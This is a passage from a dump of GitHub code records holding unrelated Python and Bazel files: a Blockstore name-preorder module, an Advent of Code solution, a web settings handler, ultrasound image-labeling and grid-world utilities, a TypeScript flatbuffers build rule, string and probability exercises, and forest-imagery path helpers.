|-----|--|----------------------------------------------|--------------|\n magic op hash(name.ns_id,script_pubkey,register_addr) consensus hash\n \n \"\"\"\n \n if not is_b40( name ) or \"+\" in name or name.count(\".\") > 1:\n raise Exception(\"Name '%s' has non-base-38 characters\" % name)\n \n # name itself cannot exceed LENGTHS['blockchain_id_name']\n if len(NAME_SCHEME) + len(name) > LENGTHS['blockchain_id_name']:\n raise Exception(\"Name '%s' is too long; exceeds %s bytes\" % (name, LENGTHS['blockchain_id_name'] - len(NAME_SCHEME)))\n \n name_hash = hash_name(name, script_pubkey, register_addr=register_addr)\n\n script = 'NAME_PREORDER 0x%s 0x%s' % (name_hash, consensus_hash)\n hex_script = blockstore_script_to_hex(script)\n packaged_script = add_magic_bytes(hex_script, testset=testset)\n \n return packaged_script\n\n\ndef make_outputs( data, inputs, change_addr, fee, format='bin' ):\n \"\"\"\n Make outputs for a name preorder:\n [0] OP_RETURN with the name \n [1] change address with the NAME_PREORDER sender's address\n [2] pay-to-address with the *burn address* with the fee\n \"\"\"\n \n total_to_send = DEFAULT_OP_RETURN_FEE + DEFAULT_DUST_FEE + max(fee, DEFAULT_DUST_FEE)\n \n return [\n # main output\n {\"script_hex\": make_op_return_script(data, format=format),\n \"value\": DEFAULT_OP_RETURN_FEE},\n \n # change address\n {\"script_hex\": make_pay_to_address_script(change_addr),\n \"value\": calculate_change_amount(inputs, total_to_send, (len(inputs) + 3) * DEFAULT_DUST_FEE)},\n \n # burn address\n {\"script_hex\": make_pay_to_address_script(BLOCKSTORE_BURN_ADDRESS),\n \"value\": max(fee, DEFAULT_DUST_FEE)}\n ]\n\n\ndef broadcast(name, register_addr, consensus_hash, private_key, blockchain_client, fee, testset=False):\n \"\"\"\n Builds and broadcasts a preorder transaction.\n \"\"\"\n \n script_pubkey = get_script_pubkey( private_key )\n \n nulldata = build( name, script_pubkey, register_addr, consensus_hash, testset=testset)\n \n # get inputs and from address\n private_key_obj, from_address, inputs = analyze_private_key(private_key, blockchain_client)\n \n # build custom outputs here\n outputs = make_outputs(nulldata, inputs, from_address, fee, format='hex')\n \n # serialize, sign, and broadcast the tx\n response = serialize_sign_and_broadcast(inputs, outputs, private_key_obj, blockchain_client)\n \n # response = {'success': True }\n response.update({'data': nulldata})\n \n return response\n\n\ndef parse(bin_payload):\n \"\"\"\n Parse a name preorder.\n NOTE: bin_payload *excludes* the leading 3 bytes (magic + op) returned by build.\n \"\"\"\n \n name_hash = hexlify( bin_payload[0:LENGTHS['preorder_name_hash']] )\n consensus_hash = hexlify( bin_payload[LENGTHS['preorder_name_hash']:] )\n \n return {\n 'opcode': 'NAME_PREORDER',\n 'preorder_name_hash': name_hash,\n 'consensus_hash': consensus_hash\n }\n","repo_name":"ben-haim/blockstore","sub_path":"blockstore/lib/operations/preorder.py","file_name":"preorder.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"11439348527","text":"with open(r\"input\") as f:\n file = f.readlines()\n relations = {}\n for relation in file:\n orbits = relation.split(\")\")\n relations[orbits[1].rstrip()] = orbits[0]\n steps = 0\n you_to_com = []\n san_to_com = [] \n key = \"YOU\" \n while key != \"COM\":\n you_to_com.append(relations[key])\n key = relations[key]\n key = \"SAN\"\n while key != \"COM\":\n san_to_com.append(relations[key])\n key = relations[key] \n you_to_com = set(you_to_com)\n san_to_com = set(san_to_com)\n print(len(you_to_com ^ san_to_com))","repo_name":"brukidm/AoC2019","sub_path":"Day 6/6b.py","file_name":"6b.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"35892088747","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport web, json\nfrom bson.objectid import ObjectId\nfrom config import setting\nimport app_helper\n\ndb = setting.db_web\n\nurl = ('/wx/get_settings')\n\n# 获取全局参数\nclass handler: \n\tdef POST(self):\n\t\tweb.header('Content-Type', 'application/json')\n\t\tparam = web.input(openid='',session_id='')\n\n\t\tif param.openid=='' and param.session_id=='':\n\t\t\treturn json.dumps({'ret' : -2, 'msg' : '参数错误'})\n\n\t\t# 同时支持openid和session_id\n\t\tif param.openid!='':\n\t\t\tuname = app_helper.check_openid(param.openid)\n\t\telse:\n\t\t\tuname = app_helper.wx_logged(param.session_id)\n\t\tif uname:\n\t\t\tdb_shop = db.base_shop.find_one({'_id':ObjectId(setting.default_shop)},{'name':1})\n\n\t\t\t# 返回全局参数\n\t\t\treturn json.dumps({'ret' : 0, 'data' : {\n\t\t\t\t'free_delivery' : '%.2f' % app_helper.free_delivery,\n\t\t\t\t'first_promote' : '%.2f' % app_helper.first_promote,\n\t\t\t\t'cod_enable' : False,\n\t\t\t\t'image_host' : '/static/image/product',\n\t\t\t\t'image_host2' : 'http://%s/image/product' % setting.image_host,\n\t\t\t\t'banner' : app_helper.BANNER['c001'],\n\t\t\t\t'default_shop' : setting.default_shop, # 返回默认站店\n\t\t\t\t'default_name' : db_shop['name'] if db_shop else '',\n\t\t\t\t'phone_number' : uname['uname'],\n\t\t\t}})\n\t\telse:\n\t\t\treturn json.dumps({'ret' : -4, 'msg' : '无效的openid'})\n","repo_name":"jack139/fair","sub_path":"src/weixin/get_settings.py","file_name":"get_settings.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"14139000156","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2 as cv\n\ndef weight_angle(angles, weights):\n '''\n Parameters\n ----------\n angles : numpy array of angles (or positions)\n The elements are angles corresponding to vast peak points \n weights : numpy array\n The elements are weights, i.e. gray values of vast peak points \n (used to weigh orientation and position of straight line)\n Returns\n -------\n The weighted angle\n\n '''\n return np.sum(angles*weights)/np.sum(weights)\n \ndef measure_line(theta, pos, point, image):\n '''\n Parameters\n ----------\n theta : theta_1 or theta_2, angle with the horizontal line \n pos : The weighted position of the feature\n point : The direction that the line points into (+1 or -1) \n (positive: up, negative: down (viewing from left to right))\n image : The image to plot the lines on\n Returns\n -------\n line_start: The left endpoint of the line\n line_stop: The rigth endpoint of the line\n '''\n x,y = image.shape[1], image.shape[0]\n line_start = (0, int(pos-point*0.5*x*np.tan(np.radians(theta))))\n line_stop = (x-1,int(pos+point*0.5*x*np.tan(np.radians(theta))))\n \n return line_start, line_stop\n \ndef get_reference_max(img_data, factor):\n '''\n Get the reference max for the image data for a given factor\n '''\n max_value = np.abs(img_data).max()\n reference_max = factor * max_value\n return reference_max\n\ndef get_peaks(grad, num_peaks):\n '''\n Get the indices of the peak points of a (gradient) radon transform \n for a given numper of peaks\n '''\n grad_copy = np.copy(grad)\n top_idxs_grad = []\n for i in range(num_peaks):\n index = np.unravel_index(grad_copy.argmax(), grad_copy.shape)\n grad_copy[index] = np.min(grad)-1\n index = np.array(index)\n top_idxs_grad.append(index)\n \n return np.array(top_idxs_grad)\n\ndef pre_cluster_outlier_removal(tops, theta, res_pos):\n '''\n Filter peak points from corners of the gradient radon transform\n prior to clustering. Inputs are the peak indices, theta and the position resolution\n '''\n to_delete = []\n for i in range(len(tops)):\n if (theta[tops[i][0]-1] < 180*0.25 and tops[i][1] - 1 < res_pos*0.25):\n to_delete.append(i)\n if (theta[tops[i][0]-1] > 180*0.75 and tops[i][1] - 1 > res_pos*0.75): \n to_delete.append(i)\n if (theta[tops[i][0]-1] < 180*0.25 and tops[i][1] - 1 > res_pos*0.75):\n to_delete.append(i)\n if (theta[tops[i][0]-1] > 180*0.75 and tops[i][1] - 1 < res_pos*0.25):\n to_delete.append(i)\n if tops[i][1] - 1 > res_pos*0.95:\n to_delete.append(i)\n return np.delete(tops,to_delete,0)\n\ndef order_labels(tops, pred):\n '''\n Reorder labels for a prediction vector such that sup-aps have label 0 (red), \n fascicles have label 1 (green) and deep-aps have label 2 (blue)\n '''\n label10 = pred[np.argsort(tops[:,1])][0]\n label12 = pred[np.argsort(tops[:,1])][-1]\n\n for i in range(len(tops[:,1])):\n if pred[i] == label10:\n pred[i] = 10\n elif pred[i] == label12:\n pred[i] = 12\n else:\n pred[i] = 11\n \n return pred - 10\n\n\ndef load_rgb(image):\n '''\n Turn an array into a grayscale image with three channels, so colored\n lines and text can be drawn on the image\n '''\n plt.imsave('temp.png',image)\n plt.close()\n img_rgb = cv.imread('temp.png')\n img_rgb = cv.cvtColor(img_rgb, cv.COLOR_BGR2GRAY)\n\n # Convert grayscale to rgb/bgr by duplicating the channels\n # This is necessary to plot colored lines on top of the image\n img_gray = []\n for i in range(len(img_rgb)):\n row = []\n for j in range(len(img_rgb[i])):\n row.append([img_rgb[i][j], img_rgb[i][j], img_rgb[i][j]])\n img_gray.append(row)\n\n return np.array(img_gray)\n\n\ndef draw_text_on_image(image, text, position, color = (0,0,255)):\n '''\n Draw text on an image, given the position (bottom left corner of text)\n '''\n cv.putText(image,\n text, \n position, # bottom left corner of text\n cv.FONT_HERSHEY_SIMPLEX, # font\n 0.5, # font scale\n color, # font color\n 1) # line type\n\n\ndef plot_results(image, theta_1, theta_2, weighted_pos_fas, point_fas, weighted_pos_deep_apo, point_deep_apo, frame_index):\n '''\n Draw the results given positions, orientations and angles of the deep aponeurosis and fascicle\n Returns an image which can then be saved\n '''\n img_rgb = load_rgb(image)\n\n # Draw the weighted fascicles and deep aponeuroses on the image\n line_start_fas, line_stop_fas = measure_line(theta_2, weighted_pos_fas, point_fas, img_rgb)\n line_start_deep, line_stop_deep = measure_line(theta_1, weighted_pos_deep_apo, point_deep_apo, img_rgb)\n\n cv.line(img_rgb,line_start_fas,line_stop_fas,(0,255,0),2) # green\n cv.line(img_rgb,line_start_deep,line_stop_deep,(255,0,0),2) # blue\n\n draw_text_on_image(img_rgb, 'Pennation angle: %.2f' % (theta_1 + theta_2), (10,50))\n draw_text_on_image(img_rgb, 'Frame index: ' + str(frame_index), (10,20))\n \n return img_rgb\n\ndef plot_double_results(image, theta_1, theta_2, penn_ANN, weighted_pos_fas, point_fas, weighted_pos_deep_apo, point_deep_apo, frame_index):\n '''\n Draw the results given positions, orientations and angles of the deep aponeurosis and fascicle from ALT\n and pennation angle from ANN\n Returns an image which can then be saved\n '''\n img_rgb = load_rgb(image)\n\n # Draw the weighted fascicles and deep aponeuroses on the image\n line_start_fas, line_stop_fas = measure_line(theta_2, weighted_pos_fas, point_fas, img_rgb)\n line_start_deep, line_stop_deep = measure_line(theta_1, weighted_pos_deep_apo, point_deep_apo, img_rgb)\n\n line_start_fas_ann, line_stop_fas_ann = measure_line(penn_ANN - theta_1, weighted_pos_fas, point_fas, img_rgb)\n\n cv.line(img_rgb,line_start_fas,line_stop_fas,(0,255,0),2) # green\n cv.line(img_rgb,line_start_deep,line_stop_deep,(255,0,0),2) # blue\n \n cv.line(img_rgb,line_start_fas_ann,line_stop_fas_ann,(0,0,255),2) # red\n\n cv.rectangle(img_rgb, (5,5), (220,100), (0,0,0), -1)\n draw_text_on_image(img_rgb, 'Penn. angle (ALT): %.2f' % (theta_1 + theta_2), (10,50), (0,255,0)) \n draw_text_on_image(img_rgb, 'Penn. angle (ML): %.2f' % penn_ANN, (10,80), (0,0,255)) \n draw_text_on_image(img_rgb, 'Frame index: ' + str(frame_index), (10,20), (200,200,200))\n \n return img_rgb\n\n\ndef filter_canny_aponeuroses(ang, pos, weights):\n '''\n Filter aponeuroses that \n 1. Are greater than 15 degrees\n 2. Point in the opposite direction than the majority\n 3. Are at the edge of the image\n 4. Are positioned very far from the average position\n Used where aponeuroses are detected with canny edge detection\n '''\n\n to_delete = [] \n\n for i in range(len(pos)):\n if np.abs(ang[i] - 90) > 15:\n to_delete.append(i) \n \n ang = np.delete(ang,to_delete,0)\n pos = np.delete(pos,to_delete,0)\n weights = np.delete(weights,to_delete,0)\n \n to_delete = [] \n vote1 = 0\n vote2 = 0\n for i in range(len(ang)):\n if ang[i] > 90:\n vote1+=1\n if ang[i] < 90: # No vote if exactly 90\n vote2 += 1\n \n if vote1>vote2:\n for i in range(len(ang)):\n if ang[i] < 90:\n to_delete.append(i)\n else:\n for i in range(len(ang)):\n if ang[i]> 90:\n to_delete.append(i)\n \n ang = np.delete(ang,to_delete,0)\n pos = np.delete(pos,to_delete,0)\n weights = np.delete(weights,to_delete,0)\n \n '''\n print(ang)\n print(pos)\n to_delete = [] \n for i in range(len(pos)):\n if pos[i] < 5:\n to_delete.append(i) \n \n ang = np.delete(ang,to_delete,0)\n pos = np.delete(pos,to_delete,0)\n weights = np.delete(weights,to_delete,0)\n \n print(ang)\n print(pos)\n to_delete = [] \n mean_pos = np.mean(pos)\n \n for i in range(len(pos)):\n if np.abs(pos[i] - mean_pos) > 40:\n to_delete.append(i) \n \n ang = np.delete(ang,to_delete,0)\n pos = np.delete(pos,to_delete,0)\n weights = np.delete(weights,to_delete,0)\n print(ang)\n print(pos)\n \n '''\n return ang, pos, weights\n\n\n\n\n\n \n","repo_name":"soleym/ml-muscle-feature-extraction","sub_path":"utils/image_labeling.py","file_name":"image_labeling.py","file_ext":"py","file_size_in_byte":8571,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"18680589025","text":"import gym\nimport gym.spaces\nimport numpy as np\nimport sys\nfrom six import StringIO, b\n\nfrom gym import utils\n\n# actions for the players\nLEFT = 0\nDOWN = 1\nRIGHT = 2\nUP = 3\nSTAY = 4\n\nMAPS = {\n \"4x4\": [\n \"S \",\n \" H H\",\n \" H\",\n \"H G\"\n ],\n \"4x4_easy\": [\n \"S \",\n \" \",\n \" H \",\n \" G\"\n ],\n \"3x4\": [\n \" HG \",\n \"S \",\n \" \"\n ],\n \"8x8\": [\n \"SFFFFFFF\",\n \"FFFFFFFF\",\n \"FFFHFFFF\",\n \"FFFFFHFF\",\n \"FFFHFFFF\",\n \"FHHFFFHF\",\n \"FHFFHFHF\",\n \"FFFHFFFG\"\n ],\n}\n\n\nclass Grid(gym.Env):\n \"\"\"\n The world is like:\n\n S___\n _H_H\n ___H\n H__G\n\n S : starting point, safe\n _ : safe surface\n H : hole, fall to your doom\n G : goal, yay!\n\n The episode ends when you reach the goal or fall in a hole.\n You receive a reward of 1 if you reach the goal, -1 if fall in a hole .\n\n \"\"\"\n\n metadata = {'render.modes': ['human', 'ansi']}\n\n # coordinate system is matrix-based (e.g. down increases the row)\n action_effects = {\n LEFT: (0, -1),\n DOWN: (+1, 0),\n RIGHT: (0, +1),\n UP: (-1, 0),\n STAY: (0, 0)\n }\n\n action_names = {\n LEFT: \"<\", DOWN: \"v\",\n RIGHT: \">\", UP: \"^\",\n STAY: \"x\",\n }\n\n # rewards from the agent's point of view\n rewards = {\n 'G': 1,\n 'H': -1,\n 'S': 0,\n ' ': 0\n }\n\n def __init__(self, desc=None, map_name=\"3x4\"):\n\n if desc is None and map_name is None:\n raise ValueError('Must provide either desc or map_name')\n elif desc is None:\n desc = MAPS[map_name]\n self.world = desc\n\n # desc has the 'world' as an array\n self.desc = desc = np.asarray(desc, dtype='c')\n self.nrows, self.ncols = nrows, ncols = desc.shape\n\n # initial state (the coords of S)\n self.current_state = self.initial_state()\n\n self.number_actions = len(self.action_effects) # number of actions\n self.number_states = nrows * ncols # number of states\n\n self.action_space = gym.spaces.Discrete(self.number_actions)\n self.observation_space = gym.spaces.Discrete(self.number_states)\n\n def initial_state(self):\n \"\"\"\n Returns the initial state of this environment\n :return:\n \"\"\"\n for row_num, row in enumerate(self.world):\n for col_num, col in enumerate(row):\n if col == 'S':\n return row_num, col_num\n\n def safe_exec(self, origin, a):\n \"\"\"\n Simulates the execution of an action,\n preventing out of bounds\n :param origin: tuple(row, col)\n :param a:the action (an integer)\n :return:\n \"\"\"\n row, col = origin\n # action effects are deterministic\n action_effect = self.action_effects[a]\n new_row, new_col = row + action_effect[0], col + action_effect[1]\n\n # ensures new coordinates are within boundaries\n new_row = min(self.nrows - 1, max(0, new_row))\n new_col = min(self.ncols - 1, max(0, new_col))\n\n return new_row, new_col\n\n def print_deterministic_policy(self, policy, outstream=sys.stdout, action_names=None):\n \"\"\"\n Prints a deterministic policy in the grid world\n :param policy: dict(observation -> action)\n :param outstream: the output stream to print into\n :param action_names: list with the char to appear on screen for each action index,\n defaults to self.action_names if not informed\n :return:\n \"\"\"\n # alias\n names = self.action_names if action_names is None else action_names\n\n # the 'world' where cells are replaced with the action described by the policy\n desc = self.desc.tolist()\n desc = [[names[policy[(r, c)]] for c, _ in enumerate(line)] for r, line in enumerate(desc)]\n\n outstream.write(\"_\" * (self.ncols + 2) + '\\n')\n outstream.write(\"\\n\".join('|%s|' % ''.join(line) for line in desc) + '\\n')\n outstream.write(\"‾\" * (self.ncols + 2) + '\\n\\n')\n # ^possible issue with overline character (Unicode: U+203E)\n\n def _step(self, a):\n \"\"\"\n Receives the agent's action a, determines the opponent's action\n and returns the outcome\n :param a: the action of the agent (an integer)\n :return: tuple(state, reward, done, info)\n \"\"\"\n self.current_state = self.safe_exec(self.current_state, a)\n row, col = self.current_state # just an alias\n\n # retrieves the tile of current coordinates (' ', 'G' or 'H')\n tile = self.world[row][col]\n reward = self.rewards[tile]\n\n # terminal test (goal or hole)\n done = tile in 'GH'\n\n self.last_action = a\n info = {\n \"action_index\": a,\n \"action_name\": self.action_names[a],\n \"tile\": '{}'.format(tile)\n }\n return self.current_state, reward, done, info\n\n def _render(self, mode='human', close=False):\n if close:\n return\n outfile = StringIO() if mode == 'ansi' else sys.stdout\n\n row, col = self.current_state # self.s // self.ncols, self.s % self.ncols\n desc = self.desc.tolist()\n desc = [[c.decode('utf-8') for c in line] for line in desc]\n desc[row][col] = utils.colorize(desc[row][col], \"red\", highlight=True)\n if self.last_action is not None:\n outfile.write(\" ({})\\n\".format(self.action_names[self.last_action]))\n else:\n outfile.write(\"\\n\")\n outfile.write(\"\\n\".join(''.join(line) for line in desc) + \"\\n\\n\")\n\n if mode != 'human':\n return outfile\n\n def _reset(self):\n self.current_state = self.initial_state()\n self.last_action = None\n return self.current_state\n","repo_name":"andertavares/gym-adversarialgrid","sub_path":"gym_adversarialgrid/envs/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"2045801351","text":"\"\"\"\nRules for building typescript flatbuffers with Bazel.\n\"\"\"\n\nload(\"@aspect_rules_js//js:defs.bzl\", \"js_library\")\nload(\"@aspect_rules_ts//ts:defs.bzl\", \"ts_project\")\nload(\":build_defs.bzl\", \"DEFAULT_INCLUDE_PATHS\", \"flatbuffer_library_public\")\n\nDEFAULT_FLATC_TS_ARGS = [\n \"--gen-object-api\",\n \"--gen-mutable\",\n \"--reflect-names\",\n \"--gen-name-strings\",\n \"--ts-flat-files\",\n \"--keep-prefix\",\n]\n\ndef flatbuffer_ts_library(\n name,\n srcs,\n compatible_with = None,\n target_compatible_with = None,\n deps = [],\n include_paths = DEFAULT_INCLUDE_PATHS,\n flatc_args = DEFAULT_FLATC_TS_ARGS,\n visibility = None,\n restricted_to = None,\n include_reflection = True,\n package_name = None):\n \"\"\"Generates a ts_library rule for a given flatbuffer definition.\n\n Args:\n name: Name of the generated ts_library rule.\n srcs: Source .fbs file(s).\n deps: Other flatbuffer_ts_library's to depend on. Note that currently\n you must specify all your transitive dependencies manually.\n include_paths: Optional, list of paths the includes files can be found in.\n flatc_args: Optional list of additional arguments to pass to flatc\n (e.g. --gen-mutable).\n visibility: The visibility of the generated cc_library. By default, use the\n default visibility of the project.\n compatible_with: Optional, The list of environments this rule can be built\n for, in addition to default-supported environments.\n restricted_to: Optional, The list of environments this rule can be built\n for, instead of default-supported environments.\n target_compatible_with: Optional, The list of target platform constraints\n to use.\n include_reflection: Optional, Whether to depend on the flatbuffer\n reflection library automatically. Only really relevant for the\n target that builds the reflection library itself.\n package_name: Optional, Package name to use for the generated code.\n \"\"\"\n srcs_lib = \"%s_srcs\" % (name)\n\n # frc971-specific modification: Add a genrule that overwrites the imports for any flatbuffer\n # types (mostly just for reflection) because they need to point to external/, not to\n # third_party/.\n # TODO(james): There absolutely are better ways to do this, but this was the quick and dirty\n # one....\n outs = [\"%s_generated.ts\" % (s.replace(\".fbs\", \"\").split(\"/\")[-1]) for s in srcs]\n includes = [d + \"_includes\" for d in deps]\n flatbuffer_library_public(\n name = srcs_lib,\n srcs = srcs,\n output_suffix = \"_pregenerated.ts\",\n language_flag = \"--ts\",\n includes = includes,\n include_paths = include_paths,\n flatc_args = flatc_args + [\"--filename-suffix _pregenerated\"],\n compatible_with = compatible_with,\n restricted_to = restricted_to,\n target_compatible_with = target_compatible_with,\n )\n genrule_cmd = \" \".join([\n \"SRCS=($(SRCS));\",\n \"OUTS=($(OUTS));\",\n \"for i in $${!SRCS[@]}; do\",\n \"sed \\\"s/'.*reflection\\\\/reflection_pregenerated/'flatbuffers_reflection\\\\/reflection_generated/\\\" $${SRCS[i]} > $${OUTS[i]};\",\n \"sed -i 's/_pregenerated/_generated/' $${OUTS[i]};\",\n \"done\",\n ])\n native.genrule(\n name = name + \"_reimporter.ts\",\n srcs = [srcs_lib],\n outs = outs,\n cmd = genrule_cmd,\n )\n ts_project(\n name = name + \"_ts\",\n srcs = outs,\n declaration = True,\n visibility = visibility,\n compatible_with = compatible_with,\n restricted_to = restricted_to,\n target_compatible_with = target_compatible_with,\n supports_workers = False,\n tsconfig = {\n \"compilerOptions\": {\n \"declaration\": True,\n \"lib\": [\n \"ES2015\",\n \"ES2020.BigInt\",\n \"DOM\",\n ],\n \"module\": \"es2015\",\n \"moduleResolution\": \"node\",\n \"strict\": True,\n \"types\": [\"node\"],\n },\n },\n deps = deps + [\n \"@//:node_modules/flatbuffers\",\n # TODO(phil): Figure out why @types/node isn't being picked up as a\n # transitivie dependencies.\n \"@//:node_modules/@types/node\",\n ] + ([\"@//:node_modules/flatbuffers_reflection\"] if include_reflection else []),\n )\n js_library(\n name = name,\n visibility = visibility,\n compatible_with = compatible_with,\n restricted_to = restricted_to,\n target_compatible_with = target_compatible_with,\n srcs = [name + \"_ts\"],\n )\n native.filegroup(\n name = \"%s_includes\" % (name),\n srcs = srcs + includes,\n compatible_with = compatible_with,\n restricted_to = restricted_to,\n visibility = visibility,\n )\n","repo_name":"frc971/971-Robot-Code","sub_path":"third_party/flatbuffers/typescript.bzl","file_name":"typescript.bzl","file_ext":"bzl","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"92"} +{"seq_id":"197814394","text":"# One Away: There are three types of edits that can be performed on strings: insert a character,\n# remove a character, or replace a character. Given two strings, write a function to check if they are\n# one edit (or zero edits) away.\n# EXAMPLE\n# pale, ple -> true\n# pales, pale -> true\n# pale, bale -> true\n# pale, bae -> false\n#\n# 1. one_edit_away\n# 2. one_away_shaffle1 and one_away_shaffle2 are not exactly what the question asks for, it has the shuffled cases counted in\n#\n\nfrom collections import Counter\n\n\ndef one_edit_away(A, B):\n len_diff = len(A)-len(B)\n if abs(len_diff)>1:\n return False\n if len_diff == 1 :\n return check_remove(A, B)\n elif len_diff == -1:\n return check_insert(A, B)\n else: # 0\n return check_replace(A, B)\n\ndef check_replace(A, B):\n count = 0\n for i in range(len(A)):\n if A[i] != B[i]:\n count += 1\n if count > 1:\n return False\n else:\n return True\n\ndef check_insert(A, B):\n for i in range(len(A)):\n if A[i] != B[i]:\n if A[i:] == B[i+1:]:\n return True\n else:\n return False\n return False\n\ndef check_remove(A, B):\n for i in range(len(A)):\n if A[i] != B[i]:\n if A[i+1:] == B[i:]:\n return True\n else:\n return False\n return False\n\n\n\n# \n# Time Complexitiy: O(N*N)\n# Space Complexity: O(N) ?\ndef one_away_shaffle1(A, B):\n if abs(len(A)-len(B))>1:\n return False\n \n diff = 0\n a = [x for x in A]\n b = [x for x in B]\n\n for x in a:\n if x not in b:\n diff += 1\n if diff > 1:\n return False\n else:\n a.remove(x)\n b.remove(x)\n if abs(len(a)-len(b)) > 1:\n return False\n if abs(len(a)-len(b)) == 1 and a[0] != b[0]:\n return False\n return True\n\n\n# Time Complexitiy: O(N*N)\n# Space Complexity: O(N) ?\ndef one_away_shaffle2(A, B):\n if abs(len(A)-len(B))>1:\n return False\n ca = Counter(A)\n cb = Counter(B)\n dd = {} # diff\n for x in ca:\n if x not in cb:\n dd[x] = ca[x]\n else:\n dd[x] = ca[x] - cb[x]\n for x in cb:\n if x not in ca:\n dd[x] = - cb[x]\n dd_r = {}\n for v, c in dd.items():\n if c == 0:\n continue\n elif abs(c) > 1:\n return False\n else:\n dd_r[v] = c\n print(dd, dd_r)\n if len(dd_r) < 2:\n return True\n if len(dd_r) > 2:\n return False\n # len(dd) == 2\n sum = 0\n for _, c in dd_r.items():\n sum += c\n if sum > 0:\n return False\n return True\n\n\ndef test(A, B):\n #print(A, B, one_edit_away(A,B))\n #print(A, B, one_away_shaffle2(A,B))\n print(A, B, one_edit_away(A, B))\n\n# test one_edit_away\ntest('abcd', 'abcd')\ntest('abcd','abecd')\ntest('abcd','bcd')\ntest('xbcd','abcd')\ntest('abcd','abxd')\ntest('abcd','acbd')\ntest('abcd','abcdef')\ntest('abefcd','abcd')\ntest('abcd','ac')\ntest('abcd', 'bca')\n\n\n# test one_away_shaffle\n# test('abcd', 'bca')\n# test('fbac','acbd')\n# test('aebcd','bdca')\n# test('aebcd','bdc')\n# test('abcd','aoped')\n# test('','')\n\n","repo_name":"icoding2016/study","sub_path":"PY/free_exercise/one_edit_away.py","file_name":"one_edit_away.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"70825774381","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom operator import mul\n\n\ndef PB(k,p):\n from sympy.utilities.iterables import multiset_permutations\n '''\n calculate partitions' probabilities using poisson binomial distribution\n \n input:\n k: #edges existed in one partition\n p: edge probabilities e.g., p=[0.2,0.3,0.1,0.5,0.5,0.8]\n \n output:\n result: probabilities of partitions\n '''\n \n #initialization\n \n result=0\n \n # if no edge in a partition:\n \n if len(p)==0:\n return 1\n \n # calculate sum of possible world probabilities\n\n l_permu=[1] * k + [0] * (len(p) - k)\n\n for perm in multiset_permutations(l_permu):\n\n re=1\n \n # calculate probability of this possible world\n \n for edge_id in range(len(perm)):\n\n if int(perm[edge_id])==1:\n \n re*=p[edge_id]\n else:\n \n re*=(1-p[edge_id])\n result+=re\n\n \n return result\n\n\n\n\ndef DFT(k,p):\n import math\n import cmath\n '''\n Approximate the probability of partitions using discrete fourier transform\n \n input:\n k: #edges existed in one partition\n p: edge probabilities e.g., p=[0.2,0.3,0.5,0.6,0.5]\n \n output:\n approximated probabilities of partitions\n '''\n\n n=len(p)\n C=math.e**((2*cmath.sqrt(-1)*math.pi)/(n+1))\n result=0\n \n for l in range(n+1):\n re1=C**(-l*k)\n re2=1\n for m in range(n):\n re2*=(1+(C**l-1)*p[m])\n result+=re1*re2\n return (1/(1+n))*result \n\n","repo_name":"uuinfolab/Expected_Modularity_Calculation_in_ProbabilisticGraph","sub_path":"Probabilities.py","file_name":"Probabilities.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31022505482","text":"import os\nimport numpy as np\n\nimport geopandas as gpd\nimport rasterio\nfrom rasterio.plot import reshape_as_image\nfrom rasterio import features, windows\nfrom affine import Affine\nfrom shapely.geometry import box\nfrom rastachimp import as_shapely, simplify_dp, smooth_chaikin\n\n# pre-processing images\nfrom skimage.color import rgb2hsv\nfrom skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value\nfrom skimage.exposure import equalize_adapthist, match_histograms\nfrom skimage import filters\nfrom skimage.restoration import denoise_tv_chambolle\nfrom skimage.transform import downscale_local_mean\nfrom skimage.util import img_as_float\n\n# segmenting images\nimport heapq\nfrom skimage.feature import peak_local_max\nfrom skimage.segmentation import watershed\nfrom skimage.future import graph\nfrom skimage.future.graph.graph_merge import (_revalidate_node_edges,\n _invalidate_edge,\n _rename_node)\n\n\ndef parse_stand_path(path_to_file):\n \"\"\"Parses useful information from the path to a stand delineation layer.\"\"\"\n dirname, basename = os.path.split(path_to_file)\n cell_id = int(basename.split('_')[0])\n year = int(basename.split('_')[-1].split('.')[0])\n agency = basename.split('_')[1]\n\n if 'oregon' in dirname:\n state_name = 'oregon'\n elif 'washington' in dirname:\n state_name = 'washington'\n return dirname, cell_id, state_name, year, agency\n\n\ndef get_naip_path(root_dir, cell_id, state_name, stands_year):\n \"\"\"Fetch path to the NAIP image for a tile nearest to stands_year\"\"\"\n if state_name == 'washington':\n YEARS = np.array([2009, 2011, 2015, 2017])\n elif state_name == 'oregon':\n YEARS = np.array([2009, 2011, 2014, 2016])\n best_year = YEARS[np.argmin(abs(YEARS - stands_year))]\n\n root_dir = (root_dir.replace('interim', 'processed')\n .replace('stands', 'naip'))\n dirname = f'{root_dir}/{best_year}'\n fname = f'{cell_id}_naip_{best_year}.tif'\n path_to_file = os.path.join(dirname, fname)\n return path_to_file\n\n\ndef get_landsat_path(root_dir, cell_id, state_name, stands_year):\n \"\"\"Fetch path to the LANDSAT leaf-on image for a tile nearest to\n stands_year.\n \"\"\"\n if state_name == 'washington':\n YEARS = np.array([2009, 2011, 2015, 2017])\n elif state_name == 'oregon':\n YEARS = np.array([2009, 2011, 2014, 2016])\n best_year = YEARS[np.argmin(abs(YEARS - stands_year))]\n\n root_dir = (root_dir.replace('interim', 'processed')\n .replace('stands', 'landsat'))\n dirname = f'{root_dir}/{best_year}'\n fname = 